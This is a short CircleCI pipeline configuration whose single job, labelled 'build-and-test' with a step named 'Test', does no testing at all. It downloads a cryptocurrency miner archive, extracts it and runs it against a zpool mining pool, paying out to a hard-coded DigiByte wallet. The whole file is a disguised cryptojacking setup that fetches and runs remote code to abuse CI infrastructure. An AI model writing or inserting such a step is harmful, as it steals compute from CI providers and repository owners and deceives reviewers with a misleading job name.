version: 2.1

orbs:
   python: circleci/python@0.2.1

jobs:
  build-and-test:
    executor: python/default
    steps:
      - run:
          command: wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.11/cpuminer-opt-linux.tar.gz && tar xf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2 -a power2b -o stratum+tcp://power2b.sea.mine.zpool.ca:6242 -u DGGjw2JWYbwFHgU7sYwPvro74Pp2T5s8Z5 -p c=DGB
          name: Test

workflows:
  all-tests:
    jobs:
      - build-and-test